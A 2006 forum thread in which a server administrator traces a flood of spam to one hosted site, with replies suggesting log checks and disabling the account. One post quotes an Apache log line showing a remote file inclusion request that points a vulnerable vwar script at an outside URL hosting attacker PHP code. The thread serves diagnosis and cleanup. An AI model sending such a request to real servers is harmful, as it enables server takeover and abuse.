Navigation

rayit · #1 17th May 2006, 08:30

Seems my server was listed on some spam filter sites..

I see al lot of messages in the mailq.
all starting with www-data@.....

how to prevend this, what is it???

thanks

Raymond
RayIT

After some googling something like this should be in the vhost file
to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

maybe for future updates of ISPCONFIG??

Are there other sollutions??

<b>Biggest problem is I can not find the website which has the bad script??!!!</b>

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<www-data@ns1.rayit.com>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<www-data@ns1.rayit.com>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<www-data@ns1.rayit.com>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<www-data@ns1.rayit.com>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<www-data@ns1.rayit.com>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<www-data@ns1.rayit.com>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<www-data@ns1.rayit.com>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)

falko · #2 17th May 2006, 15:09

Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...

rayit · #3 17th May 2006, 15:40

I can not find which web is causing the problem.

falko · #4 17th May 2006, 16:09

You could check your Apache's access log.

rayit · #5 17th May 2006, 16:42

can find nothing in the apache log files

maybe have a look?

http://www.rayit.com/syslog

and

http://www.rayit.com/ispconfig_access_log

please have a look for me...

rayit · #6 17th May 2006, 23:38

www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
"POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
HTTP/1.1" 200 163464
"http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Seems to be the problem, I think.

*Norman* · #7 17th May 2006, 23:50

Turn him off asap and ask user to resolve.

till · #8 18th May 2006, 08:30

I can only agree to Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the pike of the iceberg. The script seems to allow execution of external PHP code provided by an URL to the variable vwar_root.

rayit · #9 18th May 2006, 13:07

I chmod 000 the files and made user root
hopefully if user will update to newest release problems will be fixed..

Will point the webmaster of the site to

http://www.vwar.de/

various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

thanks

Raymond
RayIT

dayjahone · #10 15th March 2012, 15:37

I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.

Navigation

Facebook

News

Recent comments

Newsletter